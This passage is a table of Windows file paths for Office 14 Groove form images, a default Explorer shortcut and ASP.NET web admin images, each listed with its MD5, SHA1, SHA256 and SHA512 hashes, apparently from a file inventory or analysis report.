| SHA512 | 0dd4f7890384636ced706b3bea2f963b4a19ebec48ed7c0b33917d11e3802821538442aed25409823fc324a9de7c104088e96cb951cd39121c8ee5338d0ae689 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_VelvetRose.gif
| MD5 | e342d4765ea16cdc376a58a868745fc2 |
| SHA1 | 4b50252df504aa51c8f5a3d713648619bd93e74e |
| SHA256 | 446e8c47cddcb93f79d1218a97e6b267050b86df8ae9a4565e6efb12711d6e14 |
| SHA512 | 02a28490046b799bbdce3285894cc68f306616e5a97904ee304693748629eb9de6fedfcc868349a807d174a127a8ec9733b595d6d194a8deb163818a1752619c |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue\BUTTON.GIF
| MD5 | 434ee0ea5621a2d4e75750c75f288267 |
| SHA1 | 8c1177427b634a8c94337377ae8f34d9cf125724 |
| SHA256 | cc57f6eab24b757da1bca26b58b93f3bf08c6e1d9fe91f269661ff228c3f195a |
| SHA512 | 9ceafd4a1f8cc39413dbb58fd823c3e003ffa2f7450beb5352a0f941efc6452e22a5c83dc6fcadebde8692b6fd7061764b669962214f8be128dbab07d775067a |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert\TAB_OFF.GIF
| MD5 | 7e029d065181cd5ce332445de3732ee4 |
| SHA1 | afc48efbf0344469c2e6b65029b2256771c496e9 |
| SHA256 | f0da052928ffaecf2eac9666e11692ade253cedddcb9c5a7df71f36888f19d44 |
| SHA512 | d094ea99e9880efe9f25ad2785611ec4b4ea954564871ca8d0000b0057b9690e309d9d24191d1351ea3fedacca7b1cda70205a13f070771684d4911bab61c379 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert\TAB_ON.GIF
| MD5 | b6a2ee171339aacafbe7aa423568d15f |
| SHA1 | 51db6840c08f0dd702685068ca97cfe7ccc40e09 |
| SHA256 | 35364a7f17794be0caf01c7ef54b2d237f3b6a1b3765ded6b8e32fb1a8fea9a9 |
| SHA512 | 3d7daf38dea43cd09e0dc007e377c5be5a17ba5a6353e2156a7dbb422219abfd7b48aa95b1446a5c0c5f9608ccb4b4c091a77c35d0244ab52f6cccc7f84628b4 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\tab_off.gif
| MD5 | ed6b16a2d7c028702da21a075eeb4065 |
| SHA1 | 7e3b98450fb95f470dca1c1a21937598d8e1afea |
| SHA256 | caec3b77223d5e67dde35120ebfbe0ed823c16455eab8d772d74e8be86ef1b1a |
| SHA512 | 5765a71b05811175f9674e5ed99ef83fd040695a39f684de880d489f4d6d61ed25166ddcadb7dadb272916d074068cf26afcfea644c01f8b5f7ac9e173159b91 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\tab_on.gif
| MD5 | 7f9e5d2e08644851da3a582230721799 |
| SHA1 | 3c6f22e4bdf44ec9681faf81617d06dca8686146 |
| SHA256 | a615873fa51e849cf148ec7c36411a00a543e1fa2bece4f78c9555d3b8c79e1c |
| SHA512 | c8f7ac5fc1005801b1a1ed24126226c12f527a7169ce14b252f2d94f0d6119fdb600be72a84972ccd0faf103add1522e08a498360b89fa440a576fa9724494e5 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrow.jpg
| MD5 | 82310c2b6b582711cf32f43adf01df11 |
| SHA1 | 3ccca099556a3ab2bacbfd7c987cfe92fdf09db2 |
| SHA256 | 84309e7787cf809df432ce767ce8326cef6468eea45122cb9e90645d02f53618 |
| SHA512 | 4e787bd3101f3588370392b5fc62e964fe0c65abe6d1fc85b5bb9fd7c7927bdee2416cf0eca41c0eeeb8e046b04974d8190e3b16ad326c04fca16beea3975486 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrowMask.bmp
| MD5 | 4f1ea8c5cb8b63701a7c550fd0a2d641 |
| SHA1 | 219d7747243b6e39ceeac99a4ca3f16b24a0c2cb |
| SHA256 | 6cb2c6fd69d641f6796cec6451cb2f634c2a6a6fb69d7e2f8dc7450bff740171 |
| SHA512 | 1eba282d233ccddb7215b73abfa2c1971a82daca7d39994670fa0f988cf0a6d08541cdf5c9de7f58f58c8e22e195be803c9c35e15a8b181b329dff31c5be7755 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\attention.gif
| MD5 | 8dd14b363a9de14862596b9ce71368e0 |
| SHA1 | 45370b69844c3b5f048edaa3bdc255a118568524 |
| SHA256 | c3184b9717c980033f4d9438eaa7737d75d399fe9a8934eef2a443a647c7908f |
| SHA512 | 74cf54f63841fd810a6c5a9bfaa479f37f43179bb393bfc9cf1c44676f27483d26b4c68f78e223761c6020f16f745f2a020d08dd37bdea4c9217eddaa015674f |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_FormsHomePageBlank.gif
| MD5 | dc5a2dfa5a8ac342b19bda194e8737fa |
| SHA1 | 1e5c5c6b1e1208e93b680dd95c7a248fa93e233c |
| SHA256 | fa4ca65120365f39240bbcfe857f6b5ae83f47b86260e43cf1929716449355e6 |
| SHA512 | d0b676973f11c17139fc294986c91894831496dbb4c18c29d8debb6e561ad05545ee6935b5d72325a773cfe19970f6996a9d8abf86972e15940f0cdace820c5a |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue\HEADER.GIF
| MD5 | 0a7cab8b4d1f9da2b8bb36befffd751a |
| SHA1 | bc75498d72b6e3019f573ed26ad2bbf3e7d94e59 |
| SHA256 | 084e2126815cc2e686b87f2da1731601106ed3a84d2955523496516b9e6eeff2 |
| SHA512 | cafdbe01802d61dff8d1be452541055476e3e2543d4b4e75b1964d93350d50dfaee81078095434b30abc0f9057600d581f97a04ca5872e5eb47f26ff3257e167 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightOrange\background.gif
| MD5 | 64e4c9ea5fb23f06009aa5b16ca087fe |
| SHA1 | 2befd2dae6dfe6f2b53d6c949f75c7d93d28c509 |
| SHA256 | 05ba7c709efd20351b792b216ccc88e7bca3a22432a2b04e4632c6459dac827a |
| SHA512 | e7f5b5d35921247e20a84dbc2e0e7f20df2fad2b283b7982346a428702b4f3eac97b520f31e01491ba19574f174eaaba8a6eae684532a4a93a753d2495990b20 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightYellow\HEADER.GIF
| MD5 | ac6b94d770877ec5f57e1abac16a682a |
| SHA1 | 6b421c03ba819952c4d650ae3dc0dbf3dd057227 |
| SHA256 | 650a913ef0a8e29160a443b128a1d77cd95742d19f15b53ea83783a5faeeb360 |
| SHA512 | bf476a191201a5835af60dbe7f9b7c60e219ab1129d10020759a4bcc95c9e66353a5592ddd213fecd13a3a8e3e08d8edd323a78c0e410a1ca9e85a6c5a7a3c36 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\HEADER.GIF
| MD5 | 2b29edd6506b9435d6b4af7476c94303 |
| SHA1 | 27e6e37ee7559b5cd2e2c5b70fa4b4e45598d603 |
| SHA256 | 2789bb4858a36c51d6759d2dd411821fdcccf3667c235b8eb6396e4b631f3c9b |
| SHA512 | 7eae5f9545f8c76c37724a7820ccd7d4e761279197ebabaeb078ec4a235730e1746af86ccb5dd07036af8889049122c09cd242bd700ef11ccdeb4443c4d44190 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\GrayCheck\HEADER.GIF
| MD5 | b3bf57d56e13eaec75043f1826276ead |
| SHA1 | d58e7d4850ac3a1c9f265a97e6436339cfb94ef5 |
| SHA256 | 0dfaf18a41e2c90de8c5204db06080ecb6c86f273d97890dc94a5e2bc4c9bee1 |
| SHA512 | 27ff9dbcf01b6f3d04b78a5fd6378fe0d1d2b1c4aec9b280ec3794ae537425181fc8e1d12aa6ba0e01acd9d9ef895bf100f5a206912c1a1df30bbf1bb1c3b8b9 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Lime\TAB_OFF.GIF
| MD5 | 5065108a96e172bc58d5a4b24bcd323b |
| SHA1 | c129ab1d48b024258e5fb6804c10510652dcc7e5 |
| SHA256 | cb2affb29f5f57a12478a60062cc12ba28d95b6655781bb11ca470ba58b137b3 |
| SHA512 | dd91d8de4784a66399fe05a49069ae4a29f81ef0fe901018d5dbd7fea0834df378dba5b3dc1b34d032770aaf8a67cf91310527d05c2c95dc3dcc07fa620903e6 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Lime\TAB_ON.GIF
| MD5 | ecb89dd731d04c590242767099096a73 |
| SHA1 | 66d44c139be116c4aaa486bbbd84f5ac3d1c9e42 |
| SHA256 | 030c3618d3c1209e55d54188e39424513f574057eb51c9ae8a1a6fa4003ad4b4 |
| SHA512 | 9fe32df7beb38ad8e4e4f889a44a1f3c3bd1d26547cd48c20145db7784d8ceabb6a6cde0da78d9645bbb9c1ce51021789db56dbfc161a432d088a8b070ab3bd1 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\HEADER.GIF
| MD5 | b97c027d670dac50ff38a6fd272d699c |
| SHA1 | b2a3408cbe109a3386375a371ecd956f4898a970 |
| SHA256 | e5d19f9a22a5c55242e9111faeb692e3c094b86488244e503260f8d30bdeea3d |
| SHA512 | 9155ed41b28aae22af9fa7927a87aa041017ced319302c28c1793f556bd82ba4f52be767dcf0173afdbc49891e526f5e321c60640857242540ccf86a57375080 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Slate\TAB_OFF.GIF
| MD5 | d016a26367b394e93b76957a8b28e5da |
| SHA1 | 8075286903afd86c97eea771fd53f8a1794e80e8 |
| SHA256 | dad6796d6408d4312d96f6cbd40565f9f3886c20d1c62593cb247409119eb15e |
| SHA512 | 2b6eaaa021957bef48d20c8fae086aa03df77ddf91dd161d744c107292c2b79592d400a94d64f526409c2e6969fd026a24199124ec2f331479217e338efed8f0 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Slate\TAB_ON.GIF
| MD5 | 9f244ba81e340d66127f3a4a07519b7c |
| SHA1 | 4656a5d4f7ebd4b05e5ea0cd7db8cbaab000bafb |
| SHA256 | cba8950a0356ed7e2f026360a38faee13bf88d2c1244ceaa870573b4ee8886c6 |
| SHA512 | e6a728587456910eababba2eb1dd653ebf1bf6f67cc36898aface302a97058a9830d598550a5869dd3430eee74f8d9808030c7693810cf563cb6ca89e2ce59bb |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SoftBlue\background.gif
| MD5 | 05055763f935cf9022cc828e886d1b37 |
| SHA1 | be8ac646f90c04a359306e303fdd916c3bc8733d |
| SHA256 | 46e5348391bfcdffa4ea87886f4995d78ee15b351798138d57c892afd0f243a1 |
| SHA512 | 63d0bfe32aca403a2e818ba66881179253accad04497967dbb060d01b7099cf3ba9b68fd1d956f34ca0df51c7075ec94184685919d0f62cc4b62d9dc679ceb85 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SpringGreen\BUTTON.GIF
| MD5 | 6fe334b032c45292ea4b278f082a1fc3 |
| SHA1 | d5cba29ca26e54d9a7471d13575a5a98e7bb9e77 |
| SHA256 | e93c2e049a011de6c8eb05dafb8782559a7021fa85d5a0eef0a7ffa14ef1b7ea |
| SHA512 | ef2634860e55bf704b9aa5eec61323129d7ea20767bb27b4b91fdd10e2a877e4612bc6c59f5c11c3b2d7456160fa9b2e5e7b6a05f72dab8041e3d47986f5de7c |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\background.gif
| MD5 | 4ddcb9ceb0422700f279f7a6b1a24489 |
| SHA1 | 76006db0ba40b28a68d934f3239273ca9ba19730 |
| SHA256 | 01cce9d875687d0965e12ad61b5c9ee699b716823f2b138c5fa838d8a8849718 |
| SHA512 | b15cc91d1acc87320eb0d2ba28f8b7399d2030184e98c7dee56035372baa06f68faff78b60b3191dac78041823050cacd5f601d816c7369ec8f542a26bac0542 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl\background.gif
| MD5 | d2a8c97ca2d2c4c4d11ec45ad9cdd162 |
| SHA1 | d1864e46f6fa62cf19a5b72701a4999e36a71c23 |
| SHA256 | 920f90f0f6e45bf2a079af8797a5f01763d041a705de4d47d2deea274f820ba8 |
| SHA512 | d37b65b00e480b28260d7cca0d39b0a293cbeab9d7f190bb8c4034656fcfbed4919cc92c7a4adee0a98a4213c77efb62f86031b0490eae5f803bc245f32a9cff |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormToolImages.jpg
| MD5 | 37febaa62b7bedfca2f7f6824d8816b5 |
| SHA1 | 66020c80a557cd954138856ea8e28e804de63407 |
| SHA256 | 8fdaf011d7ae41f012680db4a45c563e99e6eb7707872a26602f0250b49bb47d |
| SHA512 | 97295d53b936954f1ab956bde8c08112e393cc363c605d5206a291e8e00ebd8913aadffa9426171a59298f919ced69197d07ccde4d8d7d198ec93cbac730c79b |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\RTF_BOLD.GIF
| MD5 | f109f35c72d658e5e8419128a642dc9f |
| SHA1 | dab7dbff1c12e8dbdbfcad60939d4bb07c237c88 |
| SHA256 | 4cbdbd14d5692e0d2e764e5d86287fe67291fdf8c7bffecc19b2aca58f16a216 |
| SHA512 | 9c8dee71579cb8f5c7a00b0ea5e40c3565e8213c009683105a9c02fef1ce73627d479ab9f350ffccea17439f6e6ef878c89f9ada8253a509575fbb0285fad0d5 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_choosefont.gif
| MD5 | 2b3a351fc1ef8d22c6c479ead02a52c9 |
| SHA1 | b0e41a386a39b25e958fa39cf82905877c0b43bb |
| SHA256 | 8d7fcff9f9d7cbdb8d8cadebb352fb393df46ed7763cbefb11b9003be9070552 |
| SHA512 | 16fec2a6249aca41a265be066ca018ab2a1aecdc431d77c22868ff889855b74f0627d184ad3df2108aac21e6ef216819d224a46df42f6e3e3855aa646f8c223d |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_italic.gif
| MD5 | 067138b7f15b3c53d2b9ec736836ad9e |
| SHA1 | 85620c9203ed84975a6e82a47584b6d89850f635 |
| SHA256 | ea551a7e47b2e92fe16e1b6e05a014c47a4a5aa94ae7d876b00a7bbbe0a7cbe8 |
| SHA512 | bd418b50235591597e1af6fa179b3f56be9ecc00cfcaf95f114a089fab8c3f368fe317fc915339dfbcd0482fe595c9120dea02848c2e6a10e07518c5459ae661 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_underline.gif
| MD5 | 729eefa7f3c9df72ab8789eb26746cf4 |
| SHA1 | 7196ca78919f5e9cbecb64d37a6cd0274b85784c |
| SHA256 | 3a42b4da4dfc773e9ff718c9f56ac47afb199ac7144bc5c4b18d72a8b6adce2e |
| SHA512 | e85aec599cab2b79a919e009904ee1dc9e380955a0fd92d458cab26693adc839e216e717a5b6ac92b5fee9834e55484aa7e0eb4ee4b289c1af877eb0c6a73980 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\ViewHeaderPreview.jpg
| MD5 | 67d2cab16794af766d73720d37706ff5 |
| SHA1 | e2d0b02fd00391e7092fe7b9a1a374adba299769 |
| SHA256 | b55be416bd431358ee3bb090602b2fb165eb3a7d8e6b29116c6269ce99a2cac2 |
| SHA512 | c5768be778634b7b7b6382e3d29b5662da6b2c32a0370c36f2b5cd0c3dda120c2d79e4e2e450cd96127c020c9d7be572935a0f023409d39892cb27e944cf5131 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\ADD.GIF
| MD5 | 3e65edcfffd8b441d446ef9f36f16e07 |
| SHA1 | de6d4b69d38dc7930160bd305af3c40250b0cfa9 |
| SHA256 | d7f52e2d9b644bf5ddfe71895ec2b95b85e4d3bef426732e8c5e965cb26f9681 |
| SHA512 | 6a34640d07229ef00865a398d524a40adf8a4dd8e6cdf73ab0f0558cd8936b021b66b63c9aab955ecafef618a5d211201606583b0c673f1efbd479a8fec149bc |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\CALENDAR.GIF
| MD5 | 7ffcd7c88241805145b673f1e526c5b3 |
| SHA1 | 6b72a498a4652f1018368b778537f778a59e3224 |
| SHA256 | 50a5af23fc23222216cad62a468403e541de6fcb1e76083ab29bdfe332656da7 |
| SHA512 | 2ba30519937941dcd8a0001261d6775edeb57a8c35dd09c72a3a424c6e7b90acb89c132e09fdae9f1c00fcc728cb545c13f0fa37a9ef6e45708337ad88bc0991 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\DELETE.GIF
| MD5 | e2b360b774cebda8933a8ecd2d1565ee |
| SHA1 | 2c9b0c94143b0d4208b5deb3f2138e0dd9ee4034 |
| SHA256 | 277290a5c358446b8a3ce2a6bc49afa1140ebbd68105d5b6a9bec1e389f31330 |
| SHA512 | 93aaf67a5387b89794e1240a860c94443e4f23ba4adb8936429c499d345806bb8b400f1c8d9b769c563f8b3197d8f6db580e78efa09d221bdbdc70fb41d843cc |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\ERROR.GIF
| MD5 | 1131d847dbdcc6399ce2cad9f9433d83 |
| SHA1 | 3cf6395104b2b81a3c0f05f4f9d7cc89a6024bdc |
| SHA256 | 1a4f999bc43204e837f62700a44fb7b3f1028c84feb075199984c068660da047 |
| SHA512 | 45afa4809d9ff89b968e3474981249f4df511935a39af53658ef3b3fae9125530f6522acb96bdaf082fa85f76378891f01e78d5807e6aa939a44173edd9efc72 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIcons.jpg
| MD5 | 4316e34986c15229a1e0d47aee37a3d2 |
| SHA1 | 3c31a79bfabff07e7e4288960530f8255babd9ab |
| SHA256 | ee0c2b31b15d682b4513808ba85489954d5f2c050d2cf08e2a0b38af0dcd0968 |
| SHA512 | 43d9fcec25fe8462cd62ed6bf4511c22f989ed132064767477dc7bb2da91d554ae8f0f21fdcc59eefee0025c9362e6a85e1fcdd422dfea43f11a76f77761abac |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIconsMask.bmp
| MD5 | 42ea7c2d80bec8f2f0aec12d4c9f7123 |
| SHA1 | e7f713d5295f16fc4092628987019f132e1ffa3b |
| SHA256 | 1300c1deeba7598355f15c8dbf772681cf0b39db1a50c3c856ed3523825a61a2 |
| SHA512 | 1f711613ab90dd88fba19fd9b5a5cbab0f9c6577c4dcd193027e47e861baf288c2afd822d0ffa6c6b2544f1c7f030ea721a65e77e7b0f05d877b2c5639c17df9 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\LAUNCH.GIF
| MD5 | 6026500b980644fb2ddd4759066f7235 |
| SHA1 | d0798c5324a45f3631279b0ef16a82bd5f2b5c49 |
| SHA256 | f75e56447f1e7eb82d6ba2c9d871c59dabcd28131b7920d17a63c3e31caec2ff |
| SHA512 | d4eb7a75220c842aafed03a0f432194c7a959d367b7abe2f6ad1acfd6211e9b97bd9abb82c30aa75b65813285f3d763a169249dfac6fb5e8cdeaf260d05f493a |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_alignleft.gif
| MD5 | 53cf053a784ec5d84956451fdbcd8572 |
| SHA1 | 32e32cd92beb21246452e905a263bdd1c2616795 |
| SHA256 | abe7964debeadc49e74ac5cb8a419d63c11a0fc63fb5680c2a3cb32048b50a17 |
| SHA512 | c9839a6406697ab6433dd69d9ad9e04e819b935563b06de8d21b04e8d0ea82476dfd2a07c58618ab2585df65bbdd5578eb364de7875a5962d7b98d038815f2f5 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_alignright.gif
| MD5 | c6059bd4a2858783915f34ddcce4b357 |
| SHA1 | 2f94eeefe095132784b1f0bea8eebc0fa6341f97 |
| SHA256 | 2db2eae502223835ab9eb915a04c1d1dc22a79220006f6ecd67db04ee3dd4d8a |
| SHA512 | 746c7babfca5e6471d1b7cdcd79f25101b08d36a2e88bbc9b221fef7f0dc2425d1d58b2a137f943d00ddd371dd2aa18abb409908bf93ab15536ea57f8d2dcca6 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_bullets.gif
| MD5 | d045c84721790c42c37d84d486d2cf44 |
| SHA1 | fc4b5a554cd8714b3a8b55cabab2246ba609980f |
| SHA256 | 64254363e7bcd2c930bab64db2d7821f74d118bce7aab0ceed7af881c488f4f3 |
| SHA512 | b7a63165aa5e5ecec9252f5cd58f6c061a2336e2676eaf63d04ad17341ed5a07a5cc3d0824b1250ab9a473286de9f3bb5b59e8ffb06af384a5cf7a95663e4ca1 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_center.gif
| MD5 | fa254aae7d255330ae97025f6c052fbb |
| SHA1 | 16fc8cc9d9e4f6e4734193867a769bc7123366b9 |
| SHA256 | afa30e372b2961b31c6395dee4ce44e5bd4f2fd2f2bbd59e4cae6a63ee269590 |
| SHA512 | 1f88a1571dfba579319d1e1bb249bfce14654c69dc3d624a52ffbf4020e78ca92970f45243329510fe61f5b39283297b6482661ec2c51f3a58a1df4fb15c872e |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_decreaseindent.gif
| MD5 | d873c6acdc5c1a2df5dff8366643d782 |
| SHA1 | cc17640c1a471925f09b543974680f9cf4e33dcb |
| SHA256 | e4822a1444cfccba8c69803eacc82d2aa2fdf032467b18a97798e9df78763680 |
| SHA512 | 5e9746e5b689ee6b2695d846197630f5072b4b97ac6aad033bdc1329f220f403156a7f06dda0e5da75fcd0cde272d7a4019828e36cb6402131a4482c746e490d |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_increaseindent.gif
| MD5 | 4a05e7d775ff5f5b6c259b63c9e1d415 |
| SHA1 | 8c96a18d3f9b67e18aaf651b11283ea9fd3b8e57 |
| SHA256 | c013fab02c16dcb090406c3b4fda2f3edf9804939f6a5aba97b8654a749115e9 |
| SHA512 | fb1601b1f9e02845ccbbc3dc6b9688438a099dfa2365ecfc1fe1f7bde3d41066c53b29e2e72cbe0d7557e8dbbb23f1641c3debc29bc59670b0da7f68122086e0 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_justify.gif
| MD5 | 8179db4bba39485b6249cc57062ced40 |
| SHA1 | 37a3778094b2f4691919736398d47b34e7ffcd2f |
| SHA256 | 3756e5e9718048ba93b27d68c766369d2416744f07416dde964710176af2c9dc |
| SHA512 | 4928dfd5caa46d217ac394953e19f6e69d6209ea0d8911999c997b683a2bd732f3423802c1cce6ddf694387c41bca59c8ef8356fa4f869881990dc320245503f |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_pressed.gif
| MD5 | 64ec82436e45ef578009261bc50f147f |
| SHA1 | 5fd2c67fa09b94556700afc8316a87c6a7b5b83b |
| SHA256 | 41ef262e05a87d415c32792c8774d80bd993c3ffb6a9f3334b475abf6974d01a |
| SHA512 | 2e9a1ebb32c2f9bf2f673085181aa288c27c9fff22f4437082ff978e5b855cdd06e63d07253cc5e7568ac9fa2531fb401265294d00986f33e5b7296326755352 |
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Explorer.lnk
| MD5 | 1aca0497707a207899dd7804984ce7ee |
| SHA1 | 46459d1c10cb6ebbadcac503b575d3574a43d3f9 |
| SHA256 | dda265ae389433e5113a1e07b1993f698372e9e8ddb9b02237c47994354b7ed0 |
| SHA512 | fbaf4c3f78ce13da90113d46af7485e37cf050b09d9770abe11ee41685e10553dd8930e64f5d10a225445a3b92084fbb994e72dc974284a26cccb3ab7e48b9b5 |
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\alert_lrg.gif
| MD5 | fc18677ca4043b0d8a93d01d39063887 |
| SHA1 | 3bbe3183e7c766be774f40c61f42ec19880cef4f |
| SHA256 | e27925ab98cb485a948fdcca19a5916815874769b5af5d3d254b7085c9581835 |
| SHA512 | 73a4a24ffe48796d3db3ac761770fd81af89492bfd6e10e3b7a19838f9ae8f9da7c45902a350e8d83c55d8dad441a398a61b9b361785f37f0cbe896fe619c0bd |
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\ASPdotNET_logo.jpg
| MD5 | 5f66b98035345c741845d4df520ebee6 |
| SHA1 | c73371a35aefc26303b7a7e7be729714a5f5d1e9 |
| SHA256 | 23476dc0cd1f84e63d058d48011f5a38cf490600f188cf030609780e28c75c65 |
| SHA512 | 8c224f8cd32a0befc6bca9e8ac1b84dd13956998c1b188c70739c8a4eb326a51d3ace66fc508722978cbd59eb8631a23dc5a11c06328e576762c8c110fa784d5 |
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\aspx_file.gif
| MD5 | b95280dc2d0f115eea4d02e5b67c3ed3 |
| SHA1 | bcf7fcaacb4ea2dbaf5f20f425fc2c58e0964d59 |
| SHA256 | 382f29a58f6673297b2578cbd4aec4b7b6f225af83f74faaf5983334a651f97d |
| SHA512 | ed98534e020ff950e56fb9074b8145a158d180fc9b46c1bd3ab27981ebfb8d5a84e805602c7cf409f963c9851421c88ea4277a07310b429ec0b7f360bc4008d6 |
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\branding_Full2.gif
| MD5 | a084499c4b14d106dc6ae542a55148e0 |
| SHA1 | 817f92e0ad9704a62385b2737829fb86c2e123f0 |
| SHA256 | 7ced6b3f05d22fb22e7a2c96df13d9e1f7d2297961a55dcd49205f43aef2f17e |
| SHA512 | b5e42547152eb17e3dd60a10d04bcb8bbd9bcd96c9c02baf741aaba29b8990d7e0f0fa7738c7294cd0d19ccaacde66adf3ed1cc8ad74ee6c9930a01183e25e88 |
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\darkBlue_GRAD.jpg
| MD5 | 0305f3935eb97f0e28576793fed2a454 |
| SHA1 | b6f32c3487aaa7bdd975fffdd7c97963c28b3e44 |
| SHA256 | 0bc62c17bbf1aee86137cd8d36804b3f2985240c91fcdae942f1a51dae696f95 |
| SHA512 | b63c28fbca595ccaf7ba1a0462624970c214742ba60892c9c64674d6c6728398ef92a480a2d7e41b6fdaf9138574247caea959c006fe71e4a7466429d4b80a29 |
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\deselectedTab_1x1.gif
| MD5 | b40036cff7a236be3c05c4ced98134fb |
| SHA1 | d7156ce9dbe28ef15470d0ae556d9bb1c8706fcc |
| SHA256 | ff193e5888d94c897d36f0132433d46619a75c2d8b652b8cac61dc1919aceda6 |
| SHA512 | f22b2956d7093b5e61eee47f75a27f52fc0f0963ad8786e24dae878969684aa6d15d5a39d042c2960b2a41f28c3581e57f043e43d926476cccb9136599b0f46b |
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\folder.gif
| MD5 | 537383f503195b2885e38cea448ed5f7 |
| SHA1 | 73bad596c39249e5aceab4cc66ddf5c7e116858b |
| SHA256 | 28ca666cbdea89bd23c1262dfb262f6b171a462c50b4b6a2864a34a9f6124f29 |
| SHA512 | 8f39e25c5df04854a73f9c3625ecd06a17a3ec1c83a905a91af7d9ec3be20e61febaf1243f59b67d98bb32af4a9bf0186ed9788e4ee12cf8f2405dcb82775fbd |
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\gradient_onBlue.gif
| MD5 | 757b8dd52893816d18acd53747bfb0bc |
| SHA1 | bac3e7b9b85b233e713b8dfbc5c3ad45c6d99d2c |
| SHA256 | ef562177487f2e8375c153bda7afd567272aa3892b8db33ad6da1f1ec581eb6b |
| SHA512 | 874700a1a4f8fc5a88209a9778bc2e0594742db9d88638b72228f75c01f6aad723568b3e59da8175253052d2cb9534a0f94689e02758598bb94c943fc3011a33 |
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\gradient_onWhite.gif
| MD5 | 7d79542dbeafaa523f55e565365e65d2 |
| SHA1 | 448c53227bd2a68744801f4861dac88d58be27b3 |
